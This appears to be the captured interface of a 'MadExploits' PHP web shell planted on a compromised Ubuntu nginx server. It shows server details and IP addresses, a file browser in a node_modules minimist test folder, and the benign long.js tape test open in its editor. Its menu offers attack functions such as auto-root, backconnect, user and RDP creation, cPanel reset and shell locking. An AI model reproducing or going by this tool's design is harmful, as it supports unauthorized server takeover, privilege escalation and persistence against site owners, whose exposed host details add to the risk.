Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
minimist /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
all_bool.js
756
B
-rw-r--r--
bool.js
3.85
KB
-rw-r--r--
dash.js
980
B
-rw-r--r--
default_bool.js
778
B
-rw-r--r--
dotted.js
588
B
-rw-r--r--
kv_short.js
376
B
-rw-r--r--
long.js
779
B
-rw-r--r--
num.js
909
B
-rw-r--r--
parse.js
4.5
KB
-rw-r--r--
parse_modified.js
238
B
-rw-r--r--
short.js
1.56
KB
-rw-r--r--
stop_early.js
328
B
-rw-r--r--
unknown.js
2.48
KB
-rw-r--r--
whitespace.js
191
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : long.js
var test = require('tape'); var parse = require('../'); test('long opts', function (t) { t.deepEqual( parse([ '--bool' ]), { bool : true, _ : [] }, 'long boolean' ); t.deepEqual( parse([ '--pow', 'xixxle' ]), { pow : 'xixxle', _ : [] }, 'long capture sp' ); t.deepEqual( parse([ '--pow=xixxle' ]), { pow : 'xixxle', _ : [] }, 'long capture eq' ); t.deepEqual( parse([ '--host', 'localhost', '--port', '555' ]), { host : 'localhost', port : 555, _ : [] }, 'long captures sp' ); t.deepEqual( parse([ '--host=localhost', '--port=555' ]), { host : 'localhost', port : 555, _ : [] }, 'long captures eq' ); t.end(); });
Close